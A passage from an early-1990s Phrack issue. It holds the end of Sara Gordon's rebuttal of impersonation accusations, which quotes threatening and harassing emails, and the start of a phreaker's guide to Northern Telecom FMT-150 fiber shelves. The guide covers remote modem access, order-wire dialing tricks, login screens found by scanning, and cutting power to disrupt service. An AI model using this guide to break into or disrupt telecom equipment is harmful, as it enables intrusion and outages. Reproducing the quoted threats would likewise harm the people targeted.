  9083. the truth, and there really is nothing further to be said about this
  9084. nonsense.
  9085.  
  9086.          The writing style described corresponds exactly to the one on
  9087.          the posts I received from the 'dark avenger.'
  9088.          Shortly afterward the <dav@danbo.digsys.bg> account was
  9089.          cancelled and I learned the whole truth:
  9090.  
  9091. Oh my. My writing style corresponds exactly to Dark Avengers. It
  9092. certainly does, when I want it to, or when I have been writing to him a
  9093. lot. And, it does when I write e-mail. So what? So does the style of a
  9094. of people :) We are all Dark Avenger. If you counted the names of
  9095. everyone who writes in lower case, makes spelling areas, and signs their
  9096. mail in the lower left hand corner of messages, how many people do you
  9097. think you would find?
  9098.  
  9099. About the account: Yes, it was cancelled. After Kohntark forged mail from
  9100. that site, prompting a response from WIRED, I asked the system administrator
  9101. to cancel the account so that no more such trickery could take place,
  9102. requiring me to spend time trying to straighten it out. He
  9103. was happy to do it. He had more than a few problems with Dark
  9104. Avenger ftping files in excess, and had only retained the account as a
  9105. personal favor to me. <dav> (yes, that IS how he signs personal mail,
  9106. e-mail and some of his viruses) did not exactly be a nice boy on that
  9107. system.
  9108.  
  9109.          The danbo.digsys.bg Bulgarian site belongs to Daniel Kalchev,
  9110.          another self appointed AV researcher whose best claims to
  9111.          fame are submitting various Bulgarian viruses to Patricia
  9112.          Hoffman's VSUM!!
  9113.  
  9114. Self-appointed? He is the administrator of the Internet there. I think
  9115. Kohntark is not fully aware of just who Mr. Kalchev is.
  9116.  
  9117.          (You can check this by doing a search on 'Kalchev' on the
  9118.          current VSUMs or you can contact him thru:
  9119.          <daniel@danbo.sigsys.bg> )
  9120.  
  9121. No. The best address is daniel@digsys.bg. Mr. and Mrs. Kalchev both have
  9122. accounts there, and you can reach them best if you use this address.
  9123. And please do feel free to contact him. He will tell you that he has
  9124. talked to Dark Avenger for a very long time. Long before digsys was on
  9125. the internet, and long before I met either of them.
  9126.  
  9127.          He is a very close friend of Sara(h) Gordon and he has an
  9128.          account in her VFR BBS (you can check this by logging into
  9129.          her system and checking the user list) and SHE has an
  9130.          account in digsys.bg under <sarah@danbo.digsys.bg> (this
  9131.          account is still valid as far as I know; notice the H after
  9132.          her name!)
  9133.  
  9134. Of course he is a very close friend of mine. He has visited me here, and
  9135. has been a great help to me in my work. Yes, I do have an account there.
  9136. It has been there since I was invited by the Bulgarian ACM to present my
  9137. work on Computer Viruses at their International Computer Virus
  9138. Conference. It was nice of Daniel to do this for me, to make it
  9139. convenient for me to access my mail, as I could have it forwarded there.
  9140.  
  9141. We never did remove the account, as Bulgarian's prefer to mail in their
  9142. own country for some reason. The H after my name is very simple: My name
  9143. is Sarah Gordon. On the nets, I use Sara. When I am friends with
  9144. someone, I use my given name. I do not like my given "familiar" name to
  9145. be used in my articles or in e-mail from people I don't know. It is a
  9146. quirk, I guess. My papers are presented using the Sara variant :)
  9147.  
  9148.          What I concluded is that is the DA would never get an account
  9149.          in such system as he HATES Daniel Kalchev!!!!
  9150.  
  9151. Another wrong conclusion.
  9152.  
  9153. The DA might not, but then the District Attorney usually doesn't :)
  9154.  
  9155. Wrong. and Right. He certainly did get an account there. Call Daniel
  9156. Kalchev or mail him to ask him. He has had many conversations with Dark
  9157. Avenger there. He does sure hate Daniel. In this one thing, Kohntark is
  9158. correct. He hates him violently. And, he's been on his BBS for years.
  9159. Where do you think he used to post messages FROM?
  9160.  
  9161. I tried repeatedly to act as intermediary between Dark Avenger and
  9162. Kalchev, because they both have been very good to me. There was just no
  9163. way to do it. Dark Avenger thinks Kalchev is (in his own words) "asshole
  9164. hotshot with big company and lots of money, he can afford to give free
  9165. accounts...". And yes, he used the word HOTSHOT. JUST LIKE ME.
  9166.  
  9167.          This is what really happened: Sara(h) Gordon in her
  9168.          desperation to prove that she was in touch with the dark
  9169.          avenger, told her pal Daniel Kalchev to make an account under
  9170.          the dark avenger's name (<dav> this is how she always refers
  9171.          to him, even though he never signs his name that way (check
  9172.          the source code for his 'Dark Avenger' virus or the
  9173.          'Commander Bomber' virus message name: [DAME])
  9174.  
  9175. No one has the source code for Commander Bomber that I know of except
  9176. myself and Dark Avenger, as I previously noted. He has signed his name
  9177. this way for a very long time, in his e-mail. You can verify this easily
  9178. enough by asking Todor, Daniel, Bontchev, or anyone who used to read his
  9179. old posts. Sometimes he does, sometimes he doesn't, just like me.
  9180.  
  9181.          From there she could email me messages that would come from
  9182.          Bulgaria and would be untraceable since she would log into
  9183.          her account in digsys.bg and log into the <dav> account
  9184.          internally from the same site in Bulgaria. (You can check
  9185.          where and when most of the people log from in most internet
  9186.          unix and vax sites)
  9187.  
  9188. :). If I wanted to mail Kohntark untraceable messages, I would not have
  9189. to go to this extreme, as you well know :)
  9190.  
  9191.          As it is expected from her, she has denied any of this.
  9192.          Some of her ridiculous explanations include things like
  9193.          "hotshot is a very common English word in Bulgaria" !!!
  9194.  
  9195.          You might ask yourself what is the deal with the h? is it
  9196.          sara or sarah??
  9197.  
  9198.          Well, I asked her the same question when I noticed this in
  9199.          one of the VNI interviews, where her name is spelled as
  9200.          Sarah.
  9201.  
  9202.          She replied that this was a mistake of the publisher.
  9203.  
  9204.          Mistake? well not really, it was another lie, meant to throw
  9205.          off any information and truth seekers, for example you can
  9206.          check her account in Daniel Kalchev's system:
  9207.  
  9208. I explained this previously. It was a mistake. VNI is not supposed to
  9209. use my given entire familiar name. In fact, they did mess up. They did
  9210. not use it in the Dark Avenger interview, despite I had put it there as
  9211. "Sarah". I told Dark Avenger I would do this for him. He asked me to do
  9212. it, but for some reason they did not. Later, they -did- use my given
  9213. name in a totally different situation. I can't account for their errors.
  9214.  
  9215.          <saraH@danbo.digsys.bg> , spelled with an H,
  9216.          another 'mistake of the publisher?'
  9217.          :)
  9218.  
  9219.          Other countless Sara Gordon lies are told in NUKE Info-
  9220.          Journal # 6.
  9221.  
  9222. In the last NuKe Journal, the authors posted some private mail of mine,
  9223. and said "Look how nice she knows this public mail will be read"..at the
  9224. same time, the posted some public mail, from my BBS, which I had
  9225. forwarded to one of them as a reply, and said "Look how nasty she is
  9226. when she thinks no one can see". All in all, their response to both
  9227. letters prompted a lot of people to think I had -joined- NuKe. For the
  9228. record, nope.
  9229.  
  9230.          This behavior puts in question the validity of the VNI
  9231.          interviews and the reputation of Sara(h) Gordon as a serious
  9232.          (self appointed) 'virus researcher'
  9233.  
  9234. :)
  9235.  
  9236.          IMHO the VNI interviews are a complete fabrication, meant
  9237.          only to boost her validity as a 'journalist', and to make her
  9238.          lots of money, charging for further 'interviews' to other
  9239.          magazines. (She has offered her paid 'interviewing' services
  9240.          to various other publications.)
  9241.  
  9242. :) Lots of money? Well, first off, I told you how the Dark Avenger
  9243. interview profited me. It didn't. Secondly, yes, I do write for
  9244. magazines and I sell the articles. Some, I give away. I don't do any of
  9245. this for the money. As for other interviewing, I recently interviewed
  9246. two virus writers (one who has stopped, one who has not), and they are
  9247. quite pleased with the articles. I'll ask them to contact you personally
  9248. to tell you as the article is not yet in print. Keep in mind, I have
  9249. literally no control over commentary by editors, omissions, etc.
  9250.  
  9251.  
  9252.          To the best of my knowledge the information I present here
  9253.          is true and can be checked.
  9254.  
  9255. Yes, it can be checked, and I hope you check it and print what you find
  9256. along with this commentary.
  9257.  
  9258.          I chose to publish this information, despite threats against
  9259.          my well being and countless lies about me propagated by
  9260.          Sara(h) Gordon.
  9261.  
  9262. Now, about threats and lies. Here is the sort of mail I have received
  9263. from Kohntark. In the interest of space, I will send you the headers,
  9264. etc., so that you can see them and include here only the sort of
  9265. diatribe he has been so vehemently sending me.
  9266.  
  9267. I contacted his system administrator after this continued for such
  9268. a long time. I'm not a Cori. I don't take every "hey, wanna have phone
  9269. sex" message as a potential threat, I don't call people's probation
  9270. officers for the hell of it, I don't ring up sysadmins at the drop of a
  9271. hat to accuse innocent people of causing trouble. And, I discussed this
  9272. situation with a lot of people, hackers and virus writers, friends and
  9273. foes, prior to taking this action. There's no way to know over the nets if
  9274. someone is really a maniac or if they are just playing around. In this case,
  9275. considering the nature of the mail, I did contact them.
  9276.  
  9277. First, the apology after he had gotten particularly nasty.
  9278.  
  9279.  
  9280. Organization: Anonymous contact service
  9281. Reply-To: xxxxxx@anon.penet.fi
  9282. Subject: Apology
  9283. Date: Fri, 30 Jul 93 8:08:45 EDT
  9284. Status: OR
  9285.  
  9286. Sara:
  9287.  
  9288. I want to apologize for everything that I have said that you might
  9289. have found offensive.
  9290.  
  9291. I drop all accusations I have made against you.
  9292. again, I am sorry.
  9293. I have no desire in creating any animosity, and / or bad publicity
  9294. to my name or yours.
  9295.  
  9296. Sorry things got this silly and out of hand.
  9297.  
  9298. Please accept my apologies and let's drop the whole thing OK?
  9299.  
  9300. Thank you.
  9301.  
  9302. ------------
  9303.  
  9304. Followed almost immediately by a forgery. What Kohntark did not realize
  9305. is that I am in contact with Simon. In fact, I arranged for him to come
  9306. to a virus conference, with all of his expenses paid. I am writing an
  9307. article for 40-HEX, and I immediately called Simon to ask what in the hell was
  9308. this about. After he told me, I went back and checked the mail headers.
  9309. Guess what I found?
  9310.  
  9311. From simon@skism.login.qc.ca Sat Jul 31 07:44:26 1993
  9312. Received: from anon.penet.fi by mail.netcom.com (5.65/SMI-4.1/Netcom)
  9313.         id AA17333; Sat, 31 Jul 93 07:44:19 -0700
  9314. Received: from cxxxxx.ic.xxxxxx.edu by anon.penet.fi (5.67/1.35)
  9315.               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  9316.         id AA21213; Sat, 31 Jul 93 17:40:54 +0300
  9317.  
  9318. From: simon@skism.login.qc.ca
  9319. Message-Id: <9307311440.AA21213@anon.penet.fi>
  9320. Return-Path: <simon@sklism.login.ca>
  9321.  
  9322. ****Notice: He misspelled skism. Maybe -he- is the Dark Avenger.
  9323. I mean, if spelling counts..***
  9324.  
  9325. Date: Fri, 30 Jul 93 12:01:02 EST
  9326. Subject: get real!
  9327. Apparently-To: <vfr@netcom.com>
  9328. Status: OR
  9329.  
  9330. to vfr@netcom.com.... (Nobody)
  9331. what is the matter? everyone knows you are sara gordon, are you afraid
  9332. to sign you own name now??
  9333.  
  9334.             Yes sara gordon, i heard rumours that you are passing yourself
  9335.             as the dark avenger. It wouldn't surprise me since you are
  9336.             even afraid to sign your own postings.
  9337.  
  9338.  
  9339. --------
  9340.  
  9341. Ha. Actually he signed the above message at the bottom left:) He must be
  9342. me in Real Life.... As we all have seen by now, if you sign the bottom
  9343. left of your mail, you are Sara Gordon.
  9344.  
  9345. Then, here he tells me how he has proved yet another self-appointed
  9346. virus researcher wrong. Of course, the researcher in question is not
  9347. wrong. He is Vesselin Bontchev, a rather pedantic but technically
  9348. brilliant anti-virus Doctoral student at the University of Hamburg.
  9349. Kohntark seems obsessed with proving anti-virus researchers wrong. It
  9350. would make more sense to me to learn from the researchers. I am not
  9351. talking about product developers or sales people, but researchers.
  9352.  
  9353. ME=Sara
  9354. HIM=Kohntark
  9355.  
  9356. ME: dont you get it? im sorry, i am not going to respond to all of this
  9357.     nonsense. maybe you can get vesselin to respond to you again, but
  9358.     i  doubt it considering his opinion of your 'knowledge'...
  9359.  
  9360. HIM: I don't give a damn about what he thinks, I have shown the self appointed
  9361.      virus expert is wrong.That is all.
  9362.  
  9363. ---------
  9364.  
  9365. and, here (i'm reverting to UNIX lower case now, i must be the dark
  9366. avenger..), he begins his harassment again.
  9367.  
  9368. HIM: you don't have any children do you?  It shows
  9369.  
  9370. Then, after he tell me he knows all about me, he proceeds to mail me to
  9371. taunt me with addresses referring to my child.
  9372.  
  9373. From kohntark@youhavea10yearoldson.com Sun Aug 29 10:55:45 1993
  9374. Return-Path: <kohntark@youhavea10yearoldson.com>
  9375. Received: from [193.64.138.3] by mail.netcom.com (5.65/SMI-4.1/Netcom)
  9376.         id AA07061; Sun, 29 Aug 93 10:55:39 -0700
  9377. Received: from cxxxxx.ic.xxxxxx.edu by anon.penet.fi (5.67/1.35)
  9378.         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  9379.         id AA22796; Sun, 29 Aug 93 20:50:35 +0300
  9380.  
  9381.  
  9382. ME: am tired of your threats. the only danger you are to me
  9383.     is to waste my time with this nonsense.
  9384.  
  9385. HIM: we will see.
  9386.  
  9387. HIM:  Never underestimate the power of hate.
  9388.  
  9389. HIM:   The end is coming.
  9390.  
  9391. HIM:  Also: you said 'oh my name is spelled SARA, VNI misspelled it!
  9392. yeah right ! you idiot!
  9393. you forgot who you are dealing here ha ha! not a fool like you!!!
  9394. stupid tricks like changing your name can't defend you from thy mighty
  9395. Kohntark!
  9396. prepare yourself!!
  9397.  
  9398. the end is near!
  9399.  
  9400.  
  9401. Obviously i have overestimated your intelligence..
  9402. My dog has a higher IQ..
  9403. "who is anthony naggs?.." DUHH!
  9404. Thanx for making my job easier he he.
  9405. You think you got me? sure.. go ahead.. fry that guy's account, you will
  9406. be doing me a favour he he!
  9407. AH, and start looking for a new job.. you will need it soon after i am done
  9408. with you
  9409. you idiot!
  9410.  
  9411. ------
  9412.  
  9413. He likes me to know he is watching me. Only, for a supreme UNIX hacker,
  9414. he has not mastered the skills quite yet..note the paths again..
  9415. (baby copperfield is one of the names i used. i have red hair, and its a
  9416. long story; someone asked me if i had read dickens and i replied 'yes,
  9417. I've read baby copperfield'. CHFN followed :)
  9418.  
  9419. But this was a bit eerie mail. Love him?
  9420.  
  9421. From babycopperfield@haha.com Sun Sep 12 17:39:50 1993
  9422. Received: from anon.penet.fi by mail.netcom.com (5.65/SMI-4.1/Netcom)
  9423.         id AA22703; Sun, 12 Sep 93 17:39:42 -0700
  9424. Received: from cxxxxx.ic.xxxxxx.edu by anon.penet.fi (5.67/1.35)
  9425.                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  9426.         id AA24832; Mon, 13 Sep 93 03:39:00 +0300
  9427. From: babycopperfield@haha.com
  9428. Message-Id: <9309130039.AA24832@anon.penet.fi>
  9429. Return-Path: <babycopperfield@haha.com>
  9430. Date: Fri 13 Dec 66 00:00:00
  9431. To: <vfr@netcom.com> (Sara)
  9432. Subject: I know you are on...
  9433. Status: OR
  9434.  
  9435. hi!
  9436.  
  9437. i know you are logged on now...
  9438. shame we cannot talk,, you know friendly discussions ha ha..
  9439. i might call to your bbs.. can i upload your gif picture??
  9440. yes?
  9441.  
  9442. if i like you you might just get lucky ...
  9443.  
  9444. Love  me.
  9445.  
  9446. ------
  9447.          More of his article..
  9448.  
  9449.          I am doing this to stop the lies and corruption fostered by
  9450.          the Anti-Virus industry.
  9451.  
  9452. ---------
  9453. What do you think? Is he doing -this- to stop the lies and
  9454. corruption? It seems to me that the anti-virus industry would benefit
  9455. from the Dark Avenger coming back onto the scene. They could sell more
  9456. software, get the whole hacking community attacked by people who are
  9457. afraid enough already. Why we could get a whole entire Legion of Virus
  9458. Fighters up in arms, eh?
  9459.  
  9460. If Kohntark wanted to do this 'stopping of lies and corruption', he would
  9461. not be helping to recreate the myth of the Dark Avenger. He would not be
  9462. impersonating him, harassing me, and telling people (impersonating Dark Avenger)
  9463. that he will still release viruses into the wild. I also do not like lies and
  9464. corruption, and work very hard to stop it. I do not profit from it in any
  9465. substantial way.
  9466.  
  9467. I run a free BBS: I distribute anti-virus software for free, and
  9468. encourage people to choose software that will work for them in their
  9469. situation. I don't go for the big scare tactics used by some companies,
  9470. and I don't recommend those products. Not only because I don't like
  9471. their marketing, but because their products are not as
  9472. efficient/accurate as other products. I don't like that we have to have
  9473. these products, but we do. It's a fact of life. If we can educate people
  9474. on the real situation with viruses, we can stop a lot of this "Let's get
  9475. those bad virus writers" before it's too late. We don't need another
  9476. Dark Avenger. We don't need laws that will infringe on our freedoms.
  9477.  
  9478. If anyone takes this "Sara and the Dark Avenger scam" even half-way
  9479. seriously, they can email me, and ask me whatever specific questions
  9480. they like. I also have a suggestion here, one that might even lead to
  9481. some sort of agreement between this Kohntark and the rest of the hacker
  9482. community that does not support lies and harassment. You call Todorov,
  9483. e-mail or call Bontchev. Ask them. I'll come to HoHoCon (if someone buys
  9484. me a ticket; although Kohntark thinks I had better look for a job, the
  9485. fact is I don't have a real job), and compile the bomber source code
  9486. and MtE Source (not the pitiful disassemblies that appear on a lot of
  9487. BBS, but the REAL source, supplied to me by <dav> when I questioned HIM
  9488. to make sure he was the "Real Thing". I'll show you step by step how it
  9489. compiles flawlessly and works. If after you confirm that to the best of
  9490. your knowledge, what I am saying is true, then I think Kohntark owes me
  9491. an apology. And, an apology to the rest of the virus writers and hackers
  9492. who do not need or deserve to be portrayed as evil demented creatures
  9493. who are waiting to "Destroy the World".
  9494.                               ==Phrack Magazine==
  9495.  
  9496.                     Volume Four, Issue Forty-Four, File 13 of 27
  9497.  
  9498. ****************************************************************************
  9499.  
  9500.                            METRO P/H Presents
  9501.  
  9502.                            Northern Telecom's
  9503.                               FMT-150B/C/D
  9504.  
  9505.               Optical Fiber Digital Transmission System
  9506.  
  9507.  
  9508.  
  9509. Intro
  9510.  
  9511.  
  9512. This file will cover the FMT-150, the equipment that sends info over
  9513. the digital trunks using lasers.  It is an accompaniment to our guide
  9514. to remotes (COs).  I will cover all the interesting and useful stuff.
  9515. This file is mostly for SERIOUS phreaks, we'll have more non-technical
  9516. cool stuff coming up.
  9517.  
  9518.  
  9519.  
  9520. System Description
  9521.  
  9522.  
  9523. The FMT-150 fiber optic transmission system combines DM-13
  9524. multiplexers and 150 Mb/s Fiber Transports in compact shelf
  9525. packages, I will refer to it as a shelf.  The FMT-150 product
  9526. architecture supports subscriber loop and interoffice link
  9527. applications using hub, drop/insert, repeater and terminal
  9528. configurations.  The following is what a FMT-150 shelf system
  9529. consists of.
  9530.  
  9531.  
  9532.  
  9533.       FMT-150B     1 DM-13 multiplexer (multiplexes 3 signals
  9534.                      into one signal of 44.736 Mb/s.)
  9535.                    1 150 Mb/s fiber interface
  9536.                    1 maintenance control unit
  9537.                    1 service channel unit (optional)
  9538.                    2 (or 4) power supply units
  9539.  
  9540.       FMT-150C     2 DM-13 multiplexers
  9541.                    2 (or 4) power supply units
  9542.  
  9543.       FMT-150D     2 150 Mb/s fiber interfaces
  9544.                    2 service channel units (both optional)
  9545.                    2 maintenance control units
  9546.                    2 (or 4) power supply units
  9547.  
  9548.  
  9549.  
  9550. Maintenance
  9551.  
  9552.  
  9553.                     Service Channel Unit
  9554.  
  9555. Order-wire Facility
  9556.  
  9557. Two voice channels per DS-3 signal are provided for individual
  9558. addressing using DIP switches on the SCU.  Dial over a 4 wire
  9559. headset/handset.  (more in Order-Wire)
  9560.  
  9561. Interfaces
  9562.  
  9563. The CRT (good old Cathode Ray Tube) Interface is an important
  9564. system feature of the Maintenance Control Unit (MCU).  You can
  9565. plug in to a RS-232 port directly (use a null-modem cable) on the
  9566. "shelf" or remotely via a modem (!).  Also a Tandy 200 can be
  9567. interfaced with the Maintenance Control Unit.  The network
  9568. configuration, the status of each node, and any alarm existing
  9569. can be viewed on the terminal.  The interface goes from 300 to
  9570. 9600 baud.  The software already present on the MCU is all that
  9571. is needed, the interface need only support certain emulations
  9572. (see Operation Procedures.)  (hmmm... Could Radio Shack and
  9573. Northern Telecom be butt buddies?)  Also available is a
  9574. RS-422 interface which provides a large number of alarm status
  9575. and control points through the MCU.  The port is labeled
  9576. "Customer E2A" on the shelf.  CAMMS is an extended feature
  9577. of the FMT-150.  It stands for Central Access Maintenance and
  9578. Monitoring System which can also take advantage of the
  9579. Maintenance features (see Operation Procedures).  All this is,
  9580. is a mini-terminal, that can be installed and act like a CRT
  9581. interface.
  9582.  
  9583.  
  9584. Specifications
  9585.  
  9586. When interfacing the CRT with a null modem cable, your cable
  9587. should fit the diagram below.
  9588.  
  9589. ⁄ƒƒƒƒø                                        ⁄ƒƒƒƒø
  9590. ≥1  O≈ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ≈O 1 ≥
  9591. ≥2  O≈ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ≈O 3 ≥
  9592. ≥3  O≈ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ≈O 2 ≥
  9593. ≥4  O≈ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¬ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ≈O 8 ≥
  9594. ≥5  O≈ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒŸ ⁄ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ≈O 20≥
  9595. ≥6  O≈ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒŸ ⁄ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ≈O 7 ≥
  9596. ≥7  O≈ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒŸ         ⁄ƒƒƒƒƒƒƒƒƒ≈O 4 ≥
  9597. ≥8  O≈ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¡ƒƒƒƒƒƒƒƒƒ≈O 5 ≥
  9598. ≥20 O≈ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ≈O 6 ≥
  9599. ¿ƒƒƒƒŸ                                        ¿ƒƒƒƒŸ
  9600.  
  9601.                  Pin Definitions
  9602.       1. Ground                 6. Data Set Ready
  9603.       2. Transmit Data          7. Ground
  9604.       3. Receive Data           8. Data Carrier Detect
  9605.       4. Request to Send        9. Data Terminal Ready
  9606.       5. Clear to Send
  9607.  
  9608.  
  9609.  
  9610. When interfacing your Hayes compatible (telephone connection)
  9611. configure the DIP switches in this manner.
  9612.  
  9613. X=empty space                  O X O X X O X O
  9614. O=the switch's position        X O X O O X O X
  9615.                                1 2 3 4 5 6 7 8
  9616.  
  9617.  
  9618.  
  9619. Alarms and Buttons
  9620.  
  9621.  
  9622. Listed below are some LED descriptions and button meanings that a
  9623. phreak will find on the shelf.
  9624.  
  9625. LEDs                            Description
  9626. -----------------------------------------------------------------
  9627.  
  9628. MAJOR                           RED - Service affecting failure
  9629.                                   (run, they'll be there soon!)
  9630. MINOR                           YELLOW - Non-service affecting
  9631.                                   failure.
  9632. FUSE ALARM                      RED - A fuse blew
  9633. REM                             YELLOW - An alarm has occurred at
  9634.                                   a remote site.
  9635. Order-wire Left                 GREEN - Solid, Left order wire is
  9636.                                   active, if flashing, incoming
  9637.                                   call on left.
  9638. Order-wire Right                Same as above, but for Right
  9639.  
  9640. -----------------------------------------------------------------
  9641.  
  9642. BUTTONS                         Description
  9643. _________________________________________________________________
  9644.  
  9645. LP TEST                         Lights up all LEDs
  9646. ACO                             Turns off existing audible alarm
  9647. LOC 1, 2, 3 (OW)                Rings every site common to STX
  9648.                                   signal 1, 2, and 3
  9649. EXP 1, 2, 3 (OW)                Same as above
  9650. -----------------------------------------------------------------
  9651.  
  9652. Power Supply Unit
  9653.  
  9654. This is a seemingly 5V output power supply, which has a simple
  9655. ON/OFF switch which is housed under a protective latch, pull this
  9656. and have an instant phreak marathon (see REDUNDANCY at end of
  9657. file.)
  9658.  
  9659.  
  9660.  
  9661. Equipment Configuration
  9662.  
  9663.  
  9664. The FMT-150 system is suitable for a wide variety of
  9665. applications, as follows:
  9666.  
  9667. * Access Networks
  9668.   CO to Customer Serving Areas
  9669.   CO to Digital Loop Carrier
  9670.   CO to Switch Remote
  9671.   CO to Customer Premises.
  9672. * Inter-Office Trunk routes
  9673. * Broadband Applications such as Video
  9674. * Entrance Links to Radio Systems
  9675. * Dynamic Network Routing
  9676. * Stand-Alone Multiplexer Applications with Radio
  9677. * Route Diversity
  9678. * Wide Area Network (WAN) Application
  9679.  
  9680.  
  9681. Order-Wire
  9682.  
  9683.  
  9684.                            Order Wire
  9685.  
  9686. A buzzer is heard and a flashing LED is seen if a call is
  9687. coming in, plug in a handset/headset connector into the jack on
  9688. the shelf.  To terminate the call pull the plug out or hit #.  To
  9689. dial, just plug in and dial four digits, wildcards are also
  9690. allowed by use of the * key.   The handset described is a
  9691. Contempra Handset (NT2E36AA).  A test set could also be used but
  9692. the plug would have to be altered, its 4 wire, remember.  Order Wire
  9693. is only CO-to-CO communication.  The jack can be plugged into the
  9694. front of the FMT-150 shelf.  The dialing format is described below.
  9695.  
  9696.  
  9697. -----------------------------------------------------------------
  9698. First digit:             Indicates the type of call being made
  9699.  
  9700. Second, Third, and       Indicated which site will be dialed.
  9701. Fourth digits            Address of the site is set via rotary
  9702.                          switches located on the front edge of
  9703.                          the SCU module.
  9704. -----------------------------------------------------------------
  9705.  
  9706.  
  9707. First digit significance
  9708.  
  9709. 1 = local call for STX ({Pseudo} Synchronous Transport Signal:
  9710.     First Level at 49.92 Mb/s [NT]) signal 2
  9711. 2 = local call for STX signal 2
  9712. 3 = local call for STX signal 3
  9713. (where'd 4 go?)
  9714. 5 = express call for STX signal 1
  9715. 6 = express call for STX signal 2
  9716. 7 = express call for STX signal 3
  9717.  
  9718.  
  9719. The three following digits are not standard, so if you want to
  9720. experiment with this hit a first digit and then three *'s
  9721.  
  9722. On the shelf there are buttons which act like speed dialing, the
  9723. first three letters stand for LOCal or EXPress and the number is
  9724. the signal, so EXP 2 would be broadcast call on STX signal 2,
  9725. express channel.
  9726.  
  9727.  
  9728.  
  9729. Installation
  9730.  
  9731.                    A typical FMT-150 Setup
  9732.  ⁄ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒø
  9733.  ≥            Ground Bar              ≥
  9734.  √ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¥
  9735.  ≥         Fuse & Alarm Panel         ≥                        A
  9736.  √ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¥                        |
  9737.  ≥           FMT-150 Shelf            ≥                        |
  9738.  √ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¥                       7ft
  9739.  ≥           FMT-150 Shelf            ≥                        |
  9740.  √ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¥                        |
  9741.  ≥Fiber Splice/Storage Panel or CAMMS ≥                        V
  9742.  √ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¥      <----25.94in---->
  9743.  ≥           FMT-150 Shelf            ≥
  9744.  √ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¥
  9745.  ≥           FMT-150 Shelf            ≥
  9746.  √ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¥
  9747.  ≥           FMT-150 Shelf            ≥
  9748.  √ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¥
  9749.  ≥           FMT-150 Shelf            ≥
  9750.  √ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¥
  9751.  ≥      FMT-150 or Rectifier Shelf    ≥
  9752.  √ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¥
  9753.  ≥   FMT-150 or Standby Batt. Shelf   ≥
  9754.  √ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¥
  9755.  ≥          AC outlet Assy            ≥
  9756.  ¿ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒŸ
  9757.  
  9758.  
  9759.  
  9760. Operation Procedures
  9761.  
  9762.  
  9763. Specifics on Interfacing
  9764.  
  9765. The RS-232 serial interface supports the following terminals.
  9766.  
  9767. * DEC VT 100
  9768. * DEC VT 102
  9769. * DEC VT 220
  9770. * DEC VT 320
  9771. * FALCO
  9772. * IBM 3162 with VT 220 cartridge
  9773. * Wyse WY85 with VT100 Emulation
  9774. * Ramodom VT200 portable terminal
  9775. * Televideo 922
  9776. * Televideo 9220
  9777. * Tandy 200 (only with Multipoint Plus MCU:NT7H90CA/XC)
  9778. * CAMMS (only with Multipoint Plus: NT7H90CA/XC/FA)
  9779. * Cybernex (in 8-bit mode only)
  9780.  
  9781.  
  9782. (Ok bros this is the part we are interested in so sit back)
  9783.  
  9784. Login Procedures
  9785.  
  9786.  
  9787. If you approach the FMT-150 shelf and have a previously described
  9788. interface, then you can login.  Also if you are scanning (GTE
  9789. (Northern Telecom) areas only) and come across a "sitting system"
  9790. that displays a message (below) after hitting 3 returns, you are in!
  9791.  
  9792.                    1 - DEC VT100
  9793.                    2 - NT Meridian 6000
  9794.                        (Crosstalks or Procom with VT100
  9795.                        emulation)
  9796.                    3 - Tandy 200 (running Telecom)
  9797.                    F4- NTCAMMS MDU
